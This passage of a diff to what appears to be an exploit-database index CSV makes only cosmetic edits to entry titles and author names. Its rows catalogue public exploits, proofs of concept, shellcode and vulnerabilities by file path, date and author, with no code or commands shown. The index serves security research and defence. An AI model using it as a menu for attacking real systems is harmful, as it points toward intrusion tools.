Overflow",2015-12-26,hyp3rlinx,windows,dos,0 39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 -39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 +39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 39112,platforms/linux/local/39112.txt,"QNX Phgrafx File Enumeration Weakness",2014-03-10,cenobyte,linux,local,0 39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store 'id' Parameter Multiple SQL Injection Vulnerabilities",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 -39114,platforms/ios/remote/39114.txt,"Apple iOS <= 4.2.1 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 +39114,platforms/ios/remote/39114.txt,"Apple iOS <= 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 @@ -35373,7 +35373,7 @@ id,file,description,date,author,platform,type,port 39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include",2014-03-10,Dr.3v1l,php,webapps,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0 -39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0 +39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 39128,platforms/php/webapps/39128.txt,"Jorjweb 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 39129,platforms/php/webapps/39129.txt,"qEngine 'run' Parameter Local File Include",2014-03-25,"Gjoko Krstic",php,webapps,0 @@ -35441,7 +35441,7 @@ id,file,description,date,author,platform,type,port 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX Multiple SQL Injection Vulnerabilities",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39190,platforms/php/webapps/39190.php,"WordPress cnhk-slideshow Plugin Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager 'backend/php/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 -39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,metasploit,hardware,webapps,0 +39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,Metasploit,hardware,webapps,0 39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0 39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 @@ -35482,7 +35482,7 @@ id,file,description,date,author,platform,type,port 39234,platforms/php/webapps/39234.py,"SevOne NMS <= 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0 -39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery <= 1.9.1 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 +39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery <= 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection",2014-07-07,Lazmania61,php,webapps,0 39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin - 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0 @@ -35510,7 +35510,7 @@ id,file,description,date,author,platform,type,port 39371,platforms/osx/dos/39371.c,"OS X - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 39372,platforms/osx/dos/39372.c,"OS X - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443 -39267,platforms/php/webapps/39267.html,"Ilya Birman E2 '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps,0 +39267,platforms/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps,0 39268,platforms/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",php,webapps,0 39269,platforms/php/webapps/39269.txt,"WordPress Lead Octopus Power 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for WordPress options-general.php Option Manipulation CSRF",2014-07-28,"Dylan Irzi",php,webapps,0 @@ -35570,7 +35570,7 @@ id,file,description,date,author,platform,type,port 39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39327,platforms/multiple/dos/39327.txt,"Wireshark dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,metasploit,android,remote,5555 +39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,Metasploit,android,remote,5555 39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 @@ -35672,7 +35672,7 @@ id,file,description,date,author,platform,type,port 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure",2016-02-10,Vulnerability-Lab,multiple,webapps,0 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 -39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,metasploit,hardware,remote,0 +39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,Metasploit,hardware,remote,0 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0 39439,platforms/jsp/remote/39439.txt,"File Replication Pro <= 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 39442,platforms/windows/local/39442.txt,"Windows Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0 @@ -35692,7 +35692,7 @@ id,file,description,date,author,platform,type,port 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80 39458,platforms/php/webapps/39458.txt,"OCS Inventory NG <= 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 -39461,platforms/multiple/dos/39461.txt,"Adobe Flash -TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 +39461,platforms/multiple/dos/39461.txt,"Adobe Flash - TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0 39463,platforms/multiple/dos/39463.txt,"Adobe Flash - LoadVars.decode Use-After-Free",2016-02-17,"Google Security Research",multiple,dos,0 39464,platforms/multiple/dos/39464.txt,"Adobe Flash - H264 Parsing Out-of-Bounds Read",2016-02-17,"Google Security Research",multiple,dos,0 @@ -35743,8 +35743,8 @@ id,file,description,date,author,platform,type,port 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0 39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 -39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80 -39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080 +39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,Metasploit,php,remote,80 +39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,Metasploit,windows,remote,8080 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69 39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0 @@ -35752,7 +35752,7 @@ id,file,description,date,author,platform,type,port 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0 39521,platforms/php/webapps/39521.txt,"WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0 -39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0 +39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,Metasploit,windows,local,0 39524,platforms/php/webapps/39524.js,"ATutor LMS install_modules.php CSRF Remote Code Execution",2016-03-07,mr_me,php,webapps,0 39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80 @@ -35780,7 +35780,7 @@ id,file,description,date,author,platform,type,port 39551,platforms/multiple/dos/39551.txt,"Putty pscp <= 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 39552,platforms/php/webapps/39552.txt,"WordPress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 -39554,platforms/php/remote/39554.rb,"PHP Utility Belt Remote Code Execution",2016-03-11,metasploit,php,remote,80 +39554,platforms/php/remote/39554.rb,"PHP Utility Belt Remote Code Execution",2016-03-11,Metasploit,php,remote,80 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow DoS",2016-03-14,INSECT.B,windows,dos,0 @@ -35856,11 +35856,11 @@ id,file,description,date,author,platform,type,port 39635,platforms/multiple/dos/39635.txt,"Apple Quicktime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 39637,platforms/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap-Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 -39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 Directory Traversal / Remote Code Execution",2016-03-30,metasploit,php,remote,80 +39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 Directory Traversal / Remote Code Execution",2016-03-30,Metasploit,php,remote,80 39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0 39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - CSRF Add Admin Exploit",2016-03-31,LiquidWorm,hardware,webapps,80 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 -39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080 +39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39645,platforms/multiple/remote/39645.php,"PHP <= 5.5.33 / <= 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80 @@ -35903,7 +35903,7 @@ id,file,description,date,author,platform,type,port 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80 39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0 -39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - File Upload",2016-04-13,metasploit,unix,remote,0 +39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - File Upload",2016-04-13,Metasploit,unix,remote,0 39694,platforms/windows/dos/39694.txt,"Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,dos,0 39695,platforms/php/webapps/39695.txt,"pfSense Firewall <= 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80 @@ -35912,13 +35912,13 @@ id,file,description,date,author,platform,type,port 39699,platforms/windows/dos/39699.html,"Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free",2016-04-15,"Marcin Ressel",windows,dos,0 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443 -39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,metasploit,linux,local,0 +39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,Metasploit,linux,local,0 39967,platforms/linux/local/39967.txt,"Solarwinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0 39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80 -39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80 +39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,Metasploit,multiple,remote,80 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80 @@ -35943,7 +35943,7 @@ id,file,description,date,author,platform,type,port 39731,platforms/windows/shellcode/39731.c,"Windows - Null-Free Shellcode Primitive Keylogger to File (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0 -39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,metasploit,windows,remote,80 +39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,Metasploit,windows,remote,80 39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0 39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 @@ -35963,7 +35963,7 @@ id,file,description,date,author,platform,type,port 39752,platforms/php/webapps/39752.txt,"WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0 39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0 -39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,metasploit,linux,remote,8080 +39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,Metasploit,linux,remote,8080 39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0 39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind TCP Port 1472 shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80 @@ -35996,8 +35996,8 @@ id,file,description,date,author,platform,type,port 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0 -39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0 -39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000 +39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0 +39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,Metasploit,ruby,remote,3000 39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0 39794,platforms/windows/shellcode/39794.c,"Windows - Null-Free Shellcode Functional Keylogger to File (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0 39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0 @@ -36041,7 +36041,7 @@ id,file,description,date,author,platform,type,port 39833,platforms/windows/dos/39833.txt,"Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 39834,platforms/multiple/dos/39834.txt,"Windows - gdi32.dll Heap-Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos,0 -39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0 +39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection",2016-05-17,Metasploit,multiple,remote,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80 39840,platforms/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps,0 @@ -36056,8 +36056,8 @@ id,file,description,date,author,platform,type,port 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - TCP Bind Shell Port 4444 shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 -39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088 -39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443 +39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,Metasploit,java,remote,8088 +39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,Metasploit,unix,remote,443 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0 39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80 39856,platforms/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",php,webapps,80 @@ -36119,9 +36119,9 @@ id,file,description,date,author,platform,type,port 39914,platforms/win_x86/shellcode/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39915,platforms/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos,0 39916,platforms/windows/local/39916.txt,"Riot Games League of Legends - Insecure File Permissions Privilege Escalation",2016-06-10,"Cyril Vallicari",windows,local,0 -39917,platforms/cgi/remote/39917.rb,"IPFire proxy.cgi RCE",2016-06-10,metasploit,cgi,remote,444 -39918,platforms/cgi/remote/39918.rb,"IPFire Bash Environment Variable Injection (Shellshock)",2016-06-10,metasploit,cgi,remote,444 -39919,platforms/multiple/remote/39919.rb,"Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution",2016-06-10,metasploit,multiple,remote,8080 +39917,platforms/cgi/remote/39917.rb,"IPFire proxy.cgi RCE",2016-06-10,Metasploit,cgi,remote,444 +39918,platforms/cgi/remote/39918.rb,"IPFire Bash Environment Variable Injection (Shellshock)",2016-06-10,Metasploit,cgi,remote,444 +39919,platforms/multiple/remote/39919.rb,"Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution",2016-06-10,Metasploit,multiple,remote,8080 39920,platforms/osx/dos/39920.c,"OS X Kernel - Exploitable NULL Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 39921,platforms/android/dos/39921.txt,"Android - /system/bin/sdcard Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0 39922,platforms/osx/dos/39922.c,"OS X Kernel - Exploitable NULL Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 @@ -36145,9 +36145,9 @@ id,file,description,date,author,platform,type,port 39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0 -39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 